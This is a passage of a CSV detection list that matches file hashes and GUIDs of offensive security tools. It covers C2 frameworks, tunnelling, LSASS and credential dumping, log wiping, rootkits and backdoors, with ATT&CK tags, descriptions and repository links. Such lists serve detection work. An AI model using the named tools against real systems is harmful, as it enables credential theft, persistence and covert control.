"*8ddfdad7d1865d85b87670ebf29a4fef1f3cc42cef56d1785c8ecc21cef6e55c*",".{0,1000}8ddfdad7d1865d85b87670ebf29a4fef1f3cc42cef56d1785c8ecc21cef6e55c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8dece0ec5b60725419e384b317c5be3c15d3cc12c1c7da28a53ec344118f9cd9*",".{0,1000}8dece0ec5b60725419e384b317c5be3c15d3cc12c1c7da28a53ec344118f9cd9.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","0","N/A","10","1","17","3","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z" "*8e029c31e7cbb4c481a10a27514bbaf746323fc251c002d132eaf374aae26206*",".{0,1000}8e029c31e7cbb4c481a10a27514bbaf746323fc251c002d132eaf374aae26206.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" 
"*8e068fd6cafac177fcf10e61a2672c0e572180bc20270e47e55525ad027d729d*",".{0,1000}8e068fd6cafac177fcf10e61a2672c0e572180bc20270e47e55525ad027d729d.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*8e222919847637b1a4c781f780722a7ab32a1e3d310b91496fec82fa38952409*",".{0,1000}8e222919847637b1a4c781f780722a7ab32a1e3d310b91496fec82fa38952409.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8e348a738400c38f4fe75a08f7b63e290f4b06204552190f910d39e24e61c89a*",".{0,1000}8e348a738400c38f4fe75a08f7b63e290f4b06204552190f910d39e24e61c89a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8e7eaf585d3bc9f87159ff49850b074c42a7b192ce6540b06ed04ded87ba0d92*",".{0,1000}8e7eaf585d3bc9f87159ff49850b074c42a7b192ce6540b06ed04ded87ba0d92.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8e81fd470bb1b6091600ba95f951405e35c9ee980ef34dbe6525a5aa0a672448*",".{0,1000}8e81fd470bb1b6091600ba95f951405e35c9ee980ef34dbe6525a5aa0a672448.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*8eb06c672abfaf7de3d0f8b077737415d22b502f08160180771f8b6aa5f65545*",".{0,1000}8eb06c672abfaf7de3d0f8b077737415d22b502f08160180771f8b6aa5f65545.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8ebc87ad08296cb20668cd2d4c3a5a5cdd847100f3e5cf559d1b48ebae32959b*",".{0,1000}8ebc87ad08296cb20668cd2d4c3a5a5cdd847100f3e5cf559d1b48ebae32959b.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*8ef891d6334629876c3c94569c9c35acd3b3d2b6930ee1c90086d715e120a40c*",".{0,1000}8ef891d6334629876c3c94569c9c35acd3b3d2b6930ee1c90086d715e120a40c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8efd5b8fbdba3db4ebd783214b56dae23e329eae2c7b1ce36aa59f0726cd35a0*",".{0,1000}8efd5b8fbdba3db4ebd783214b56dae23e329eae2c7b1ce36aa59f0726cd35a0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8F018213-4136-4D97-9084-F0346BBED04F*",".{0,1000}8F018213\-4136\-4D97\-9084\-F0346BBED04F.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" 
"*8F018213-4136-4D97-9084-F0346BBED04F*",".{0,1000}8F018213\-4136\-4D97\-9084\-F0346BBED04F.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*8f13ce758ca663d93b81c6db2c658cade683058012e65cbb066a82dac4f58311*",".{0,1000}8f13ce758ca663d93b81c6db2c658cade683058012e65cbb066a82dac4f58311.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8f1c38bd7991da18509ef47cf01ebb1f1527acce08a9a0b25f46f70486bd5132*",".{0,1000}8f1c38bd7991da18509ef47cf01ebb1f1527acce08a9a0b25f46f70486bd5132.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" 
"*8f2a1d66e0a532a030da8e0e646f866ea91ee987ffb33b36d95f64a0538a3e20*",".{0,1000}8f2a1d66e0a532a030da8e0e646f866ea91ee987ffb33b36d95f64a0538a3e20.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "*8f31909ad50984539183ebd099eceed04617e520d44c8ef0081a114aa8d5ed01*",".{0,1000}8f31909ad50984539183ebd099eceed04617e520d44c8ef0081a114aa8d5ed01.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*8f3fc1278c3632af8725bc717de00833c6710b955372756f30b4ed0a6cccdd0f*",".{0,1000}8f3fc1278c3632af8725bc717de00833c6710b955372756f30b4ed0a6cccdd0f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8f6fd0bc95fcbefdfa01a3f7e809914696bc1285a7f7bc39c3bbd1d2314b8299*",".{0,1000}8f6fd0bc95fcbefdfa01a3f7e809914696bc1285a7f7bc39c3bbd1d2314b8299.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*8f98671d7d96d0e04df6f8510a65f4cdf1fdea2978a0e0a67c998274c40051de*",".{0,1000}8f98671d7d96d0e04df6f8510a65f4cdf1fdea2978a0e0a67c998274c40051de.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8fa721d35e169cddadb3a6569755c20ce19b9336125a7e5692bd0f76ee276911*",".{0,1000}8fa721d35e169cddadb3a6569755c20ce19b9336125a7e5692bd0f76ee276911.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8fa721d35e169cddadb3a6569755c20ce19b9336125a7e5692bd0f76ee276911*",".{0,1000}8fa721d35e169cddadb3a6569755c20ce19b9336125a7e5692bd0f76ee276911.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8fc21bc6c4a11583b4db44e3dad0980bdb5c7ace*",".{0,1000}8fc21bc6c4a11583b4db44e3dad0980bdb5c7ace.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*90023e0492635199b386d05e8bffdb806f0cc6a6d0e6a2dbc9a58867d002b566*",".{0,1000}90023e0492635199b386d05e8bffdb806f0cc6a6d0e6a2dbc9a58867d002b566.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*90229D7D-5CC2-4C1E-80D3-4B7C7289B480*",".{0,1000}90229D7D\-5CC2\-4C1E\-80D3\-4B7C7289B480.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential 
Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*9036e04e3c1caa4b91d008a010df98e93449cfcd1ace8922d96883bd1587764c*",".{0,1000}9036e04e3c1caa4b91d008a010df98e93449cfcd1ace8922d96883bd1587764c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*9037b5197eeeb068f24a73f9ac99320e0aeed9a91a69f18eec013c689be871bb*",".{0,1000}9037b5197eeeb068f24a73f9ac99320e0aeed9a91a69f18eec013c689be871bb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*903d7db4500738baf1e30f3923909fda0df637ca2fd904a6e67565f72925f613*",".{0,1000}903d7db4500738baf1e30f3923909fda0df637ca2fd904a6e67565f72925f613.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*904b042e2ec7aa85331911b1343213292e061dcc4f2010d01f4f7b60f0198b10*",".{0,1000}904b042e2ec7aa85331911b1343213292e061dcc4f2010d01f4f7b60f0198b10.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*906397a1765b82510679cb5b0f26ef1c8c89335c68f1d17178f924e5b2544454*",".{0,1000}906397a1765b82510679cb5b0f26ef1c8c89335c68f1d17178f924e5b2544454.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*90873c2ac02c860b3b6ec7cf262ab58504ff187dd9e638bbabef94e985607836*",".{0,1000}90873c2ac02c860b3b6ec7cf262ab58504ff187dd9e638bbabef94e985607836.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","N/A","10","10","1302","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z" "*90a9080ebaafb4fcf1deb6e6810b4cfc38e0c16b6c9849969aee3a23a730db5b*",".{0,1000}90a9080ebaafb4fcf1deb6e6810b4cfc38e0c16b6c9849969aee3a23a730db5b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*90bb2613b2c711e20dce52480e998feda6e8488017e6f792b486616529cad8b2*",".{0,1000}90bb2613b2c711e20dce52480e998feda6e8488017e6f792b486616529cad8b2.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*90bf7beb921839957e7977851f01e757346d2b4f672e6a08b04e57878cd6efbf*",".{0,1000}90bf7beb921839957e7977851f01e757346d2b4f672e6a08b04e57878cd6efbf.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","0","N/A","10","2","133","15","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z" "*90c08dc1a2ec6ad65002990fe43220d8974c92a02c2639562447c98bdbc04a22*",".{0,1000}90c08dc1a2ec6ad65002990fe43220d8974c92a02c2639562447c98bdbc04a22.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*90dfb88b36bbfab99ffae972aaf0d1959fd7729b11e7b5933486cd2848270fd6*",".{0,1000}90dfb88b36bbfab99ffae972aaf0d1959fd7729b11e7b5933486cd2848270fd6.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*90e2d1bb612d9658067799266605dff148b292dafd4f6ddff3e184a9b7998376*",".{0,1000}90e2d1bb612d9658067799266605dff148b292dafd4f6ddff3e184a9b7998376.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*90F6244A-5EEE-4A7A-8C75-FA6A52DF34D3*",".{0,1000}90F6244A\-5EEE\-4A7A\-8C75\-FA6A52DF34D3.{0,1000}","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","0","N/A","8","N/A","N/A","N/A","N/A","N/A" "*90fcf63af14fcaee770bbf4f777845b46fc81a6c38ed966bb80c7b5078d46f17*",".{0,1000}90fcf63af14fcaee770bbf4f777845b46fc81a6c38ed966bb80c7b5078d46f17.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*911be80c0cbcc8c3bc351a3e60db0d7494858603*",".{0,1000}911be80c0cbcc8c3bc351a3e60db0d7494858603.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*9120da326f6d13c492ca42da217b25a24515ca0d2f468acde8ddb5d5417c6652*",".{0,1000}9120da326f6d13c492ca42da217b25a24515ca0d2f468acde8ddb5d5417c6652.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*91302dd386709f514908c61d52d0e917ef6c4db866ee9f9f1b387ceb1e87cd7a*",".{0,1000}91302dd386709f514908c61d52d0e917ef6c4db866ee9f9f1b387ceb1e87cd7a.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*913d774e5cf0bfad4adfa900997f7a1a*",".{0,1000}913d774e5cf0bfad4adfa900997f7a1a.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. 
